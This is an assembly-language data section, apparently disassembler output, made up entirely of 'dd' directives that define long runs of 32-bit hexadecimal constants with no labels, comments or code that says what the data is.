dd 93B8D438h, 0B30293A6h, 9A3D2316h, 0E766DBBBh, 9606114h
dd 8A88FDEh, 0EB0A9D01h, 8E2D990Eh, 0F2C287C9h, 2966C172h
dd 0E8A762FFh, 0EC7B2421h, 0ED0085B2h, 424380FFh, 9BDAED89h
dd 0A835AFC1h, 90C33297h, 2D49BEE0h, 0DAF07BCAh, 0F2DB1AC0h
dd 73B3DE52h, 0BA22E286h, 5D72F87Ah, 0D59C9480h, 7D8417A3h
dd 400FB454h, 527DF342h, 0EF71D3A9h, 34D6E22h, 8B2BA9BCh
dd 0C170B0A5h, 0F9EB5D89h, 2A79B23Ch, 3BB6BF3Bh, 0C0160DF9h
dd 9D88B822h, 0FAB4E6B0h, 0F26373BBh, 34C73769h, 76340AD6h
dd 191399Bh, 0C6C57FE3h, 5893945Ah, 31FEBD4Fh, 221F2383h
dd 0BC2DCD85h, 27F04626h, 82D4BE36h, 5B24C9C8h, 925CBFC0h
dd 860BCF53h, 0A7146C98h, 1B36724Ah, 434BA730h, 5955FCBh
dd 2FE6062Eh, 579ADBB6h, 0D695D040h, 62566837h, 25C8346Ah
dd 3A4083BFh, 749CC600h, 45B8586h, 331F798Ch, 1644CFCDh
dd 0D8390EAh, 13215754h, 9849DF9Ch, 0D0DDA62Eh, 3DE3CB97h
dd 761756B9h, 8066E6F6h, 5B4C1A6Dh, 4FC35770h, 0EBB1F0EAh
dd 0A88AED1Ch, 6055C0E9h, 0ECC54AA2h, 6A96B35Ch, 1D8EDA49h
dd 0CD891B20h, 0F68BFB23h, 0F5FC6DFAh, 14C1C704h, 93E2A3D3h
dd 69FAE41Eh, 6F075E8Fh, 0C361792Fh, 0CFEF3D20h, 0B7B1278Ch
dd 91734AC1h, 854B7D55h, 79C9A054h, 0F2394173h, 447DC25h
dd 8C35A01Dh, 0D76128D6h, 692EE8B2h, 0A78760E5h, 0A3F956EAh
dd 0EEF6D5BEh, 0A3911A8h, 0A0935215h, 8E37BD25h, 0E51BF11h
dd 5FD30E38h, 56082F1h, 0B2EC7BDAh, 60B3A026h, 0F71F6711h
dd 40D4A416h, 1DB3D57Bh, 0EB76CE1Ch, 18B10620h, 89D25675h
dd 565D7EDFh, 661759C6h, 5A66885h, 0E5AFA0DBh, 9D49EB56h
dd 0F6C1646Ch, 0E24E2135h, 29E3206Dh, 9969489Bh, 2F5B1EDh
dd 2F193529h, 0A3C7E108h, 44845EEEh, 180119A0h, 3635C62h
dd 447058C6h, 7E666EFCh, 0D6A5FF7h, 0BD1F494Dh, 0AC71DBE3h
dd 711C408Ch, 0E9F295C9h, 40268452h, 0F5FF8171h, 0CB4822FFh
dd 90FB2831h, 0F69E5FB6h, 4F212143h, 5B20A2D0h, 17530696h
dd 4B690086h, 33CEA67Eh, 1612CB12h, 7E0E369Bh, 6847FF9Ah
dd 2C59E189h, 0AC324F48h, 38053406h, 0C03C1980h, 731722FFh
dd 264BE95Bh, 6E931D73h, 0BBD11782h, 0C07D359Ah, 366A4B2Eh
dd 16AB6505h, 0E7B667C7h, 31B7BA2h, 825D0D29h, 3D4BFD9Dh
dd 0B301C8F5h, 0E801AB8Bh, 552A78E5h, 832FB040h, 7233B87Fh
dd 4E061C54h, 0FD259AAh, 36730938h, 88B6EC0Ah, 0ECC38819h
dd 7F88879Eh, 0C9CB7F9Ch, 2F3C0BC5h, 7F178486h, 41C73197h
dd 0B5B5A0FEh, 3D2B58C8h, 8B106942h, 48CBEA0h, 9EBDB655h
dd 42435678h, 0A61D9563h, 839D27B0h, 0CAD47276h, 0E464F273h
dd 2A5E6563h, 0CCD331DEh, 0CF11605Dh, 404544E3h, 0A9FE423Eh
dd 0E26849D2h, 2119539Bh, 3C1F86C6h, 0DD2A6F24h, 0DAB25351h
dd 769735E2h, 0D5D75718h, 8D2AD117h, 2C3B638h, 0B046E5EEh
dd 175EE8F7h, 0B49C696Ch, 0E9629000h, 3055DB82h, 0E5FDCB8Dh
dd 14DD797Ah, 63F2D82Ah, 9F2A78Ch, 73847586h, 0B0AA8A03h
dd 0D368B721h, 0DD1FE779h, 0FE264470h, 227C2804h, 8FC1C457h
dd 7E893FCh, 0C002889Ch, 3CC9EE2Bh, 946765DBh, 0EB7B77A6h
dd 0C97F9A4Ch, 0DAB656FCh, 0C16544B3h, 300119C8h, 1B92E51h
dd 4341C31Dh, 0D0D9C52Fh, 0CBB51F48h, 88E7FB29h, 6EAA689Bh
dd 32D509F4h, 0B50E5D58h, 0C04416E1h, 0F785208Dh, 4BB0FA1Ah
dd 0D6806145h, 813CB7BAh, 5A17A7CEh, 32E5DD41h, 627389CCh
dd 0D618D373h, 0EE36060Eh, 46E301CCh, 0FFE8EF1Bh, 8A34D248h
dd 0F14E92B5h, 0AC029792h, 46B29754h, 0EB1F6829h, 0AA2E07F2h
dd 9110C868h, 0C81B32E0h, 0D055D770h, 0D4BEC97h, 253D460Bh
dd 0F7139906h, 62EE974Ah, 66A0153Ah, 5B7FFC76h, 97D8D2C4h
dd 0F43D5941h, 0DC8F4DB5h, 7DE54565h, 9DC0BDBAh, 59195E3Dh
dd 617D1032h, 0F9B17247h, 728337BFh, 91053063h, 19957430h
dd 25FBF7FDh, 0DFEFD9D0h, 6F0D9F54h, 9D065328h, 0E8255F8Eh
dd 3AA7766Eh, 0CF965081h, 9F21CA3h, 8520D18Eh, 963383F8h
dd 31B10722h, 60ADD92Bh, 0FBC08AD7h, 0A5E24D81h, 31AB7C96h
dd 36C28487h, 78563405h, 8C5150C1h, 801BAFB2h, 0F6EBDD5h
dd 0B37C2FB8h, 0C7630BBDh, 8ADAE64Eh, 16658AEh, 89B65464h
dd 724389B2h, 99BC888Eh, 0F721DC8Fh, 4A136C69h, 51632405h
dd 85B55B48h, 0AEB29128h, 5685B83Bh, 0A70E4C9Ch, 3775951Dh
dd 0E8A022A4h, 0CA52B307h, 0C44289E3h, 3D3255EFh, 0AA9C1B77h
dd 0BDCC4F71h, 736EA28Bh, 53EB4895h, 0DD36A0AAh, 0E0C64153h
dd 3ED2CA37h, 80901890h, 0D77492C3h, 34541FAFh, 0A25BB897h
dd 0A0469B31h, 0C7BFAD1Bh, 7AE3037Eh, 6A2173A0h, 0BEB5A09Dh
dd 2474856Bh, 0DB51D01h, 0E5F4BA0Dh, 43CC7E75h, 0D9253B01h
dd 0D75750B8h, 82AA8477h, 0BC132DDBh, 0B550E461h, 0DB747037h
dd 7B030FC2h, 0A429118Eh, 77200FA7h, 0FAAB1403h, 1EB6842Dh
dd 0A14DDE6Ch, 790F2752h, 0F44467E8h, 928C3C7Eh, 0A11A84A3h
dd 9A2268EBh, 22AC4972h, 9DF7461Dh, 961E48DAh, 0BCDA7A61h
dd 60214859h, 0A32FCF7Bh, 1AB376C1h, 505287F7h, 73590462h
dd 7C0864B2h, 0CFA205C9h, 914AFC46h, 90D0824Fh, 0D9720304h
dd 5D479860h, 9FFD17E4h, 0B8B041Ah, 4CF43A58h, 6BFDE53Fh
dd 0F9053495h, 0EE071390h, 0BE3003Ah, 0E2E32EA4h, 6273737Fh
dd 332A459Fh, 0AB16C804h, 6D6015B7h, 4B9CB0E0h, 0E2D36809h
dd 6140BE2Bh, 44712B75h, 7E35D7AEh, 10A13FEh, 0F805D3A3h
dd 326E3284h, 68C87A1Ch, 43047592h, 2FD0F3C7h, 5CF4097Ah
dd 354BE47Dh, 3A0C1F7Eh, 0A98ABFBDh, 6A7D00Bh, 0C159C95Fh
dd 0CD64D4C4h, 15D4F26Ah, 983882C4h, 0E7652FA8h, 243CD3ACh
dd 0C59A8DC3h, 0F0F40DE7h, 43F9F502h, 814813Dh, 23C5F78Ch
dd 164B9C59h, 0DBBFB07Bh, 3C904E4Fh, 0DA891D92h, 72281AC6h
dd 0EF2B94CDh, 8AD6DE57h, 0E539D448h, 0CF68B2FDh, 0E7A43981h
dd 55DE76E1h, 0DFA34AFBh, 0A702D0E4h, 0A7D07C5Dh, 94F1F1EDh
dd 0A68226EFh, 5869E974h, 33B48230h, 12B5CDD3h, 7A188391h
dd 0BFE5F20Bh, 0E60389ADh, 545D7B0Ah, 0F4B66FF6h, 0EE44FF88h
dd 23610AEEh, 76BC7FF7h, 0A09C0F15h, 0BF8136B3h, 85D027A1h
dd 913D7AD0h, 5E0AF2E2h, 6731C26Bh, 0DFB1BDEFh, 0AA30813h
dd 4597B721h, 3403417Ah, 99320C30h, 0E7F8CCB1h, 0B7D080C8h
dd 0E4A39339h, 0BF90AB13h, 5C627406h, 2E7F7CCDh, 8D6101DEh
dd 0A9BCBAD3h, 7BD3C582h, 0CCE911CCh, 0C9E17B99h, 51463A37h
dd 0C095E6EBh, 3109993Eh, 3D6E2358h, 9A0B2BBEh, 4BCB8AA9h
dd 1B35487Eh, 885C4161h, 96E7C73Bh, 0BBABB6F4h, 8CC83A44h
dd 8EBB4131h, 5F405BA2h, 4DBE208Ah, 0DC7AFF0Ch, 98C21647h
dd 28940303h, 3BE2D382h, 0F3B98E8Eh, 0C00F0900h, 3B323754h
dd 49F0FAC2h, 35A09121h, 99540FFCh, 5B789D58h, 0D697CBF1h
dd 97E62110h, 5A054EBAh, 0A6CE1B2Ah, 0DF9CCDC6h, 0D7B7AB2Bh
dd 0E41D6616h, 87DC66D7h, 2C075351h, 40B42E1Eh, 0F0FE4445h
dd 85760C62h, 0A4B79A03h, 0FAF1B189h, 7FFFE152h, 0F2768637h
dd 0DE6CC7A2h, 13900EF4h, 0CB6B89E5h, 0A2B495D3h, 593323E4h
dd 0F0BD0140h, 4758E0E1h
dd 4FA92BB6h, 40846EFBh, 0FC3325ACh, 4648029h, 0EC7D22F5h
dd 6CD4BF3Ah, 7CA0F3CBh, 0C658CE61h, 0A4AC68Ah, 36EA99DEh
dd 0C27F02F7h, 0FD751947h, 2E557A38h, 5447CD11h, 7B0B679Eh
dd 4939E1D8h, 5E49FB87h, 0ABAA0B8Fh, 5AA11050h, 1269B633h
dd 47823886h, 0CBBD8AB7h, 9C781620h, 0BFE44506h, 432EA8Fh
dd 0D4B27FD6h, 591A60DCh, 515AB8A1h, 0A40BF595h, 86E15A4Dh
dd 0B3FDCEAAh, 3199B03Bh, 0E5E9D62Dh, 49F2C9CEh, 35FE8A17h
dd 3ABC85E4h, 46A1504Ch, 0C5F06CE3h, 5A9D44CCh, 7C04C7E2h
dd 0FF14279Fh, 0BC61ADB9h, 0EF51EB5h, 0A16347BFh, 44A2925Eh
dd 34DBAF11h, 0F557B7FBh, 95524184h, 247362C5h, 0F9941EBCh
dd 17ED4994h, 5F266128h, 4902DFE4h, 52B88647h, 9DBB6A1Bh
dd 7DDB6BF5h, 3C15F591h, 6BB345BFh, 0D2E5159Ch, 6349ECE0h
dd 0E6A83783h, 2D7CB1C4h, 0BD03559Dh, 0D929FF98h, 197A6309h
dd 0DEC04DB7h, 59FF9286h, 6210CF7Ah, 0AF5FFFCDh, 183177BFh
dd 0BB250C5h, 241E3574h, 0E686501Eh, 8174EE3Bh, 760409CFh
dd 428D4590h, 0AFF3CCDBh, 7CC908BBh, 45BCD209h, 98FFD52Fh
dd 8929D860h, 0CCEE6F3Fh, 6822D6Ch, 85AC56D2h, 701B54h
dd 4C3D939Dh, 3039BE08h, 66D8F1D6h, 0A7838193h, 7CCAE9F4h
dd 49A28B89h, 0B0639BCAh, 0AE483F30h, 9A11A762h, 8C0C1F25h
dd 44C1BA89h, 0D6FDF6DCh, 643917A9h, 5AFCB043h, 96B347CBh
dd 0E3BA28B6h, 9678FBB3h, 53E91F37h, 4D29752Ch, 3E91003Ah
dd 4EE7F907h, 6CE6BA38h, 8CD50DBDh, 2D90C818h, 826BD494h
dd 669E559Fh, 0C8AAB213h, 6C84092Eh, 0D716748h, 2E80BABh
dd 979920DDh, 6156C1B8h, 0AA2C768Dh, 0A85DB231h, 37B9C61Eh
dd 361FA07Fh, 5BCE095Fh, 0F624B1A3h, 0FB45AC57h, 76B1197h
dd 0BCC542BAh, 16B5E690h, 200C6F27h, 0BD4BE00Fh, 0A6BFF540h
dd 1B6DC56Dh, 0BE98F98Ch, 0E0557624h, 319846DAh, 5A11B213h
dd 0B8759EC1h, 0F665318Fh, 0A173B25Ah, 0C544860Bh, 0A0C19C7Bh
dd 76D6F55h, 0BEEC5B2Dh, 77030EA6h, 9BD4F851h, 0B8B51AB9h
dd 0C41A4B21h, 4B8812CFh, 0DB72A4A6h, 0E996061Bh, 0F7E0529Dh
dd 2C82CC03h, 0BF5B1890h, 0A5604234h, 0F7F17E22h, 124006DAh
dd 4F24753Eh, 0AE685627h, 567985F6h, 765D52A6h, 0C81B51C7h
dd 10A052E1h, 0D7407D70h, 0C0AAE2C6h, 8081328Ch, 3A78CF51h
dd 20C2A212h, 7805DD1h, 0D2FB9095h, 0BA8CD13Dh, 61D96CAh
dd 0F47778ACh, 4C7C1640h, 1B2A81A7h, 9B0E42A5h, 4FCCE4ACh
dd 85E09Bh, 0A345555h, 0B8122C94h, 2C2DB77Ah, 0E69DE2ABh
dd 0D2246B1Ah, 41B26678h, 2C9CC697h, 0FB16D7D0h, 0AEB466F4h
dd 5941F1C7h, 0C34E0944h, 0E2160BACh, 42558415h, 8325B8F7h
dd 3080A27Fh, 281A9617h, 9D2CF5D1h, 15AC1552h, 0FF43EE5Ch
dd 0E085AAC3h, 0F1B8D56Dh, 4DE83E75h, 0E029CE47h, 6C242D21h
dd 0CF47BE76h, 0A1985C73h, 0F7C33FCFh, 8D1C6B5Fh, 445D47A3h
dd 551E126Ah, 6FC1CA97h, 3327C907h, 6537E59Bh, 0DE883992h
dd 923B791h, 5F74349Eh, 0BBA9D6C6h, 126CE605h, 1563E21Ch
dd 6FC4EDCFh, 0F7A1E689h, 7E4EBEF9h, 0BADEE0C5h, 0B14806F0h
dd 97F5260Eh, 0D760843Fh, 2B94C57Bh, 466E97F9h, 181904DCh
dd 2DB7C58Fh, 0BC8B62A2h, 6362145Bh, 7F926CD8h, 0F13926CEh
dd 0A6F38B34h, 67EAE3C2h, 2FE5F34Ah, 0A1FE118Fh, 2A20BEB7h
dd 77F9A07Bh, 0FF338E65h, 9720B424h, 42C633E0h, 82029F0Dh
dd 31668F4Ah, 3A921888h, 487E101Ah, 0FC2B884h, 0C8C99515h
dd 0BE4820DFh, 9490532Dh, 97CE5697h, 0AD62C15Dh, 2AC9E76Dh
dd 7A89F69Ah, 9CE966CAh, 87764507h, 5FFF861Fh, 71C5AE98h
dd 583DB4DAh, 43676364h, 3D27A0DCh, 0FE385742h, 22173E8Ch
dd 0F459C0FEh, 808964BEh, 0C2C1D927h, 0EAAE7001h, 22C1BA39h
dd 4AA2B07Bh, 5E54D4E3h, 778D9884h, 0E00B89FAh, 6F975A84h
dd 0AF3E70h, 0BB654779h, 1389E0FCh, 5DD099E3h, 0FFEE6904h
dd 6ADA6F38h, 0E94590F5h, 0A9D7DC88h, 38BF4FD9h, 8246B5E1h
dd 8D8A93BFh, 8376BF2Fh, 89CF54CFh, 18360F09h, 84C07015h
dd 8DCDCE09h, 0E145E3FCh, 306F9DB9h, 6A4901C4h, 5A3D9B49h
dd 45F1EFC1h, 1C3E248Eh, 63C8C746h, 3B70371Eh, 23759BE6h
dd 1AD5CF80h, 68B2FFC3h, 0E9FFF81Bh, 944C6E3h, 94817137h
dd 0D525B488h, 71F51DFFh, 3751B38h, 437AE08Fh, 876E16C9h
dd 2CE25BCAh, 47709827h, 2E2D0F57h, 8AE68881h, 6763E1BBh
dd 0C41AF8BCh, 0E508BF7Bh, 64AEC62Ah, 40D7D5DBh, 0C8308EDh
dd 0FBC595C2h, 426D7FA4h, 72865B02h, 0A0743BF9h, 0E2C8A06Fh
dd 3955E0B2h, 0C50D0079h, 55F1A9A5h, 9E588406h, 0B462F5A2h
dd 0DD4C7D94h, 0AAE41473h, 949BAE3Ah, 1D31ABA2h, 0A21D17A4h
dd 7A747A2Ah, 0EE95F4F8h, 0CA8FB532h, 0E09C4725h, 0B7DB97EFh
dd 0B9E292B5h, 4A20B74Ch, 9CF067DFh, 0EAB88999h, 608C573Ah
dd 2CC3CDCEh, 7693A94Ch, 4DBA4A4Ch, 0FAC43B0Fh, 367F56ABh
dd 9D1C976Ah, 65C7748Fh, 0D5DE36A5h, 68803E57h, 3435075Fh
dd 0C4FCBD68h, 3E067F7Eh, 3364539Fh, 1D3FE3FAh, 7CD3AB4h
dd 0D01898Dh, 257B3396h, 580B0A6Bh, 0C9761729h, 16D09814h
dd 5C29622h, 72BFC48Dh, 0E91358C6h, 4871942Fh, 45925FF0h
dd 0B95F33C0h, 5E492749h, 0F5C5738Ah, 51CB555Ah, 7CF5538Ah
dd 14B61D74h, 1F42702Eh, 546354F8h, 7128F66Ah, 1C532D7h
dd 0EE3710F1h, 6E343828h, 0E2AD61Ah, 2BE8E645h, 4A2AA2C0h
dd 0D534983Bh, 0E8D5121Bh, 2FDEF660h, 3D9C11CAh, 0AB9B374Eh
dd 2F54897Bh, 9B67A7E5h, 8F87A6B9h, 0BE22DE9Dh, 362EB877h
dd 20F64CB1h, 7CEABDE9h, 0F7AF1401h, 0E68C5C75h, 0E13392Ch
dd 34C3E7EFh, 0A709B351h, 6ED21912h, 9A783D0Fh, 877E2635h
dd 5BEF9331h, 42A1E209h, 1F0E2962h, 0F0CF317Eh, 48D8B5C1h
dd 75A7A6D3h, 1AF46D5Ah, 331C05B3h, 9D1C3332h, 0CC5ACA70h
dd 5EF6B1A5h, 12B1EC0Ah, 55B962C0h, 0BA9933A2h, 0B340542h
dd 74CA9881h, 0E1894Dh, 87787CBh, 6EC13714h, 469561C5h
dd 0C2F2E77Dh, 8E26DF13h, 0F17EB875h, 597BABD3h, 88444E34h
dd 819DD3E9h, 5CD24796h, 10AA1208h, 0BB9208E0h, 0BA8C0915h
dd 34C3610h, 4CC0C27Ah, 0AE989C67h, 0C4F15A9h, 0CE62F7E5h
dd 0DA2D969Ch, 8121365h, 3DAE0258h, 145B8DF1h, 350020F8h
dd 33697DC5h, 0D6033020h, 5D666D0Bh, 5DDA459Dh, 13488249h
dd 0CE05B5BCh, 26F09849h, 0CC886318h, 29583BD6h, 0FC0ECBEBh
dd 3D21D681h, 9EA1FD68h, 47701D70h, 3FFE99D3h, 13820658h
dd 4EF9F90Ah, 8B591545h, 49EB579Ch, 0CC991007h, 0FECA670Fh
dd 88095D00h, 1C1D2E2h, 35548AB3h, 63110773h, 3541B9Ch
dd 9A33D50Dh, 7E3713FDh, 0B6865342h, 5442DA93h, 0E1179C4Fh
dd 0FE722EA2h, 0D6BDF570h, 2310C933h, 77ED62F1h, 7053C8h
dd 396E28AAh, 987832C3h, 8FE778B7h, 69096E25h, 0FE086C4Ah
dd 93F0FDF8h, 47D2072Bh, 0B629B711h, 4780007Ch, 0FE28C72h
dd 80AE57BBh, 0E3459274h, 6ADAF56Dh, 539273FBh, 0FB4B518Bh
dd 4C142AEAh, 961677B3h, 1198ECB0h, 3E7DECF8h, 54D0E155h
dd 3F728482h, 0D4925BBCh, 0AFC380A6h, 2A7C1797h, 2C2E9BCBh
dd 0E17EB1D4h, 5B876C0Bh, 5A87F10Ch, 0B8E4F444h, 98BB6FF0h
dd 57CE9EC7h, 39E1F62Dh, 18D48116h, 3BF95919h, 5B6FBAFDh
dd 0C5FA7F89h, 0F7B850A3h
dd 30C4DF76h, 0C7D79217h, 0BA9B249Ch, 4A897A3h, 6432D91Bh
dd 0E33E552h, 7C9A0960h, 0D25F97C5h, 97FE0965h, 8C9D76F4h
dd 83E6B39Ah, 0D793F464h, 9DCBC896h, 539D996Ch, 0A2F2EAC2h
dd 4F7E9B88h, 0A5F50BD6h, 4BC37A58h, 8F03091Bh, 6D1517C7h
dd 0A19C17A4h, 5652F00Fh, 0E2BEE8C1h, 0DD6507BBh, 9B9DA720h
dd 3B94FD56h, 68D108ECh, 7EFABDFh, 6157DC41h, 0B45111D8h
dd 83CD9BD7h, 0E2211581h, 1EE6EF8h, 9FE2F4D3h, 0D2960519h
dd 0A822DFEh, 0F67D7A96h, 0AA691A51h, 99091C35h, 0E2BB2453h
dd 0DACD348Eh, 6F6E4515h, 632EFAFEh, 8CD7024Bh, 5C764DBAh
dd 15A1BBB1h, 84523D01h, 0D4DE789Bh, 8B09B86Ah, 0A8F00F0h
dd 5A824125h, 310888D7h, 22DF1AA3h, 0C9423906h, 7DE86D54h
dd 0FDB3EA1Ch, 0D868017Ch, 0D53F951Dh, 0E9A534E3h, 0AB43D011h
dd 36EA552Dh, 0DBFE2246h, 824DE9C5h, 2D8D916Eh, 0A979B9A9h
dd 85B1D745h, 7EC2EFE9h, 63B94DDh, 99DC4AD2h, 8246827Fh
dd 0BBB7B6F3h, 0E9290E57h, 1ADE0F9Fh, 593C3812h, 22B5FC88h
dd 26CDFE0Dh, 0E55DBDB1h, 8B061C1Bh, 4AC0B45Eh, 4FB9FEF1h
dd 0A8FD95D6h, 806C0997h, 9A3DD83Bh, 0C539B11Fh, 87742435h
dd 0E4A013BCh, 0FDCBEE71h, 40F48375h, 0D9FB2346h, 20AA754Fh
dd 0F1259D90h, 0F143B4CAh, 0EACDCCF8h, 298FE9DBh, 2B48FE9Dh
dd 0B668AC5h, 500C7EF9h, 71E1D256h, 0AE3F6CB1h, 98B91690h
dd 4BCBD838h, 18DDF28Ah, 0EF5363C1h, 0F2F888B9h, 5CC86424h
dd 0CC43DBA2h, 6B146958h, 0DD357A8Ch, 5BA7E7BEh, 44F3821Eh
dd 0CA64B7F2h, 0A187F3A9h, 0C5618C3Ah, 0FBCD76ECh, 0F1A7A9D4h
dd 63C544D8h, 36DDF2CFh, 4CDF8035h, 0BCEEFED5h, 0AF63F89Ch
dd 4A47BA6Eh, 5BC047C0h, 0AC28D370h, 92D77E45h, 8B7E5AB2h
dd 0A636E601h, 91E4D2D8h, 107524DDh, 3D190757h, 50A8E495h
dd 49269D7h, 3E64DA6Ch, 30AB27C6h, 0D1A2A442h, 0C9FDD683h
dd 8A356393h, 0E65C222Fh, 84924A36h, 96C215F0h, 3D695251h
dd 3382481Dh, 2CA009D2h, 4306D9ABh, 0AECCDF75h, 0EA2A6CF7h
dd 905118F1h, 592EF7FEh, 0F360A0EFh, 5685B7EFh, 2F72A9DCh
dd 20133305h, 6D37F495h, 70F03CECh, 0A8823399h, 0B2FB8B75h
dd 0EAD7FBA0h, 0F1E2B9F3h, 0CCF435CEh, 20254602h, 84F67B23h
dd 33F6B3A3h, 0F0789E18h, 63E0D94h, 0DA40619Ch, 0D49F35CCh
dd 0F54A609Dh, 0E7E356D2h, 513D1E78h, 0A85EFAA1h, 1D86FE12h
dd 88AE5994h, 986AAA1Bh, 0D84FB0F2h, 1673D779h, 0BC0B4A6Ah
dd 226976A0h, 0DE4ED13Bh, 8266ADC8h, 8445AC51h, 2BD972D3h
dd 0D45C5C68h, 0D1299C8Ch, 0A1DA0C85h, 537BA0B3h, 274077F8h
dd 0C579651Ah, 6867B40Ah, 554AF9AFh, 79E10862h, 0FD5CE9Ah
dd 233AF62Dh, 7ABEFCECh, 6473FDABh, 33B3DFADh, 0B5C12C32h
dd 49441751h, 8BF3B9CCh, 4F61B1EBh, 20EB1035h, 1E06D309h
dd 93B6CDF4h, 98BFA32Dh, 0D0D5D3F1h, 82B59A46h, 72BC971Ch
dd 719B9DC5h, 4B53E67Bh, 69D3FB11h, 0B49C222h, 8E5ECAECh
dd 492D8519h, 4EC952EBh, 9B04A6E5h, 5836B616h, 28B7B4A4h
dd 4FAB0F4Ah, 627B9F21h, 37B4DE00h, 9EA36230h, 42F0DAA6h
dd 4704CD4Eh, 0DD976435h, 0EA5B55B2h, 1E59926Ah, 2FE0FEBAh
dd 0C44F0288h, 8DF58303h, 0AD1B8Bh, 0C364E497h, 0A0BD138Ch
dd 1C73D0FEh, 0B36A9A1h, 0BF47C54Fh, 0E9D18077h, 0F581950Ch
dd 66578564h, 226BA216h, 5ECEB3Ch, 455CFD09h, 81EA8242h
dd 194A023Eh, 5524C404h, 0C1C1ACBEh, 0D5983AC4h, 3229D293h
dd 43525FFFh, 0AC36D000h, 0ECB7BCF3h, 78F4CC4Dh, 0D4E9AD31h
dd 0E92085Fh, 146F8436h, 18C3F5A2h, 8BCCA4F2h, 47F97939h
dd 8EDC2D8Eh, 1FFC4C2Dh, 39A1D654h, 669256BCh, 26B1DFD6h
dd 0A906AED2h, 0F24E10Ch, 5CFB437Eh, 718E3C0Eh, 0CB83051Ah
dd 41F48E32h, 0E59C57FCh, 9DE05864h, 42A6F721h, 7C360B2Bh
dd 0FCA4EB93h, 94E7E0C4h, 0E1502C2Ch, 3479CA5Bh, 1508E2A2h
dd 3280ED62h, 7B325A6Ch, 0F7F311E3h, 2892AF2Bh, 7EA10AA4h
dd 3BE46C4h, 5E61236Eh, 0AF80ACCEh, 8C8D8CD2h, 262E0D7Bh
dd 0AD6AC29Bh, 709EB371h, 0B9D86D82h, 42F799B5h, 40A07A3Bh
dd 0A3039636h, 6409FC1Fh, 0BB64AFFCh, 0B8AC8E42h, 4C47D8C8h
dd 64E609F0h, 0E5F621C1h, 0A85A509Ch, 3C87F7E1h, 472D32E1h
dd 758986B5h, 2A14155Bh, 53E3408Ah, 0CA852C68h, 0D7878CB1h
dd 66F9FFC5h, 0B81EF861h, 0D400B890h, 6239FC47h, 0A7F23689h
dd 0F5FC11Ch, 55AD654Eh, 22FCCC4Bh, 0B1C351FDh, 2D4F3FA5h
dd 0F12150ACh, 7A414F52h, 3C4D0C16h, 3CF1E805h, 600D9285h
dd 2CE551A8h, 0F4DE181Fh, 0B56665C2h, 0C0AD9850h, 2D0DF4D0h
dd 39CFFE0Ah, 837BA657h, 2F51224Dh, 3A516037h, 46060849h
dd 9C0308F6h, 52651F1Dh, 612011BEh, 2CB8A064h, 28F0BB8Ah
dd 65113DB1h, 39122F83h, 5B2455AEh, 54FD84D8h, 0DA783C9Ch
dd 5449DE7Fh, 0D2B2179Bh, 126A21ACh, 48445285h, 569E14A0h
dd 189ED268h, 0EAFC5967h, 47E9DECh, 0A04F6D49h, 496F6760h
dd 2D440AEDh, 0D544B7AFh, 7C4506A4h, 0B25133E6h, 1964661Ah
dd 728648Ah, 8652C88Ah, 86EB4BDBh, 40E42990h, 0A41773E5h
dd 9296E85Ah, 0EEE7F151h, 0A8C02331h, 0A895F564h, 82B123BEh
dd 0D008E005h, 5A3A8CCh, 3605CF7Ch, 0F83E4B64h, 2D96E3D0h
dd 1576E04Eh, 3BA350CBh, 6310C237h, 0CE99C21Dh, 0A6E07529h
dd 55BD87F7h, 0ACA7B1D5h, 0A89A1018h, 0F69C1969h, 0D1DDC61Eh
dd 0C5189D81h, 9787F271h, 0CD4EA33h, 9FC85F38h, 318FD155h
dd 0B747738Eh, 0A3A7DE52h, 5866799Ah, 6194D389h, 0B43E1616h
dd 1308684Eh, 4C5E90h, 4CAEE23h, 0F1F352ACh, 30F57AFFh
dd 0E3B1EDFCh, 0A93CB51Fh, 0AA3F74D3h, 0B9A7A7DDh, 4CC94E3Dh
dd 6DC4160Eh, 3A9C1CB6h, 0CF658B7Dh, 456B6635h, 883713EAh
dd 38794C0Dh, 0A139C62Fh, 1A50B4EFh, 10E489C9h, 2FD47290h
dd 20671C50h, 908322ABh, 0DC3B9439h, 899AEAC6h, 34AF33EAh
dd 21F65B6Ch, 4E15065Ch, 0A316CE79h, 47B605A9h, 66626BB0h
dd 5CCE6B14h, 0D1675AE0h, 353DCCD4h, 598A47D5h, 71AEB077h
dd 0C395E9D9h, 0D45E4C16h, 4E1F878Ah, 20E87535h, 0BFF1CB98h
dd 348C396Dh, 0DD6E2B6Fh, 0D7DFF1B2h, 9BBEE319h, 54ED83B6h
dd 0CD036D72h, 952B9134h, 34BCB135h, 0D9B25799h, 0A474F9CEh
dd 0EB062913h, 324267DAh, 8A050BE2h, 0E293791Ah, 0A6A0F91Bh
dd 0EA958F12h, 0C8B437DFh, 6EFF4B34h, 4F030CEFh, 0E26652E7h
dd 9CC4A7B2h, 398F4A9Eh, 149D5C4Bh, 632517F7h, 24A07A4Ah
dd 0D247A3DAh, 0B131526Ah, 6E0F90ECh, 0C424A1C6h, 0B3B77B02h
dd 81AF45E7h, 0E5DEB79Dh, 56C7141h, 0FF82570Ah, 0EB6A5583h
dd 679B1F7h, 0E88EE17Dh, 985DD6B4h, 0A54A0D1Bh, 57DBEE0Ah
dd 0F9C1F798h, 639CFFAh, 4DE42EBBh, 6911CEEh, 4D2E94F0h
dd 0D07ACE8Bh, 6E35C51Ah, 99574886h, 587343ACh, 80E96BA2h
dd 0F1E4A7B4h, 32BD3B9Ah, 0DC8875A3h, 3AAA9EEBh, 8D4F7244h
dd 76EA1C7Fh, 342B1D3h, 63E93721h, 13C65DF1h, 0A6CF188Bh
dd 0E4D661Ah, 0EBBB7A2h, 0BF333A2Fh, 0C8813489h, 6797915Ah
dd 16BB2A6h, 0C2694BF3h, 0A4A361E6h, 7D9ADE3Dh, 0E06E239Bh
dd 669CFDA2h, 43813DB5h, 96C2A8A2h, 77ABB372h, 6805938Eh
dd 5F804EE8h, 0DE0BB380h, 0B7885190h, 2DE9F936h, 9CAA4C1Eh
dd 1551CACEh, 3E325689h
dd 0F62F6C70h, 1AC1BC18h, 6BB73985h, 0E607D1Ch, 9862C1F7h
dd 3D58C7C5h, 0D515AF5Eh, 196DD4E7h, 0CFB7150Fh, 0E380290Fh
dd 19336EDh, 355B5D13h, 48B97AE1h, 0E81E265Eh, 33D24C76h
dd 575E0A20h, 0CC1AFAB0h, 98DAD15Eh, 0DC27348Ah, 0A57A7612h
dd 7E1292D6h, 503BD2CCh, 6D0517h, 6BA54564h, 166B4CBBh
dd 0C0E5C34Dh, 7FC50294h, 7AEAFC96h, 8B9EB065h, 0FA404799h
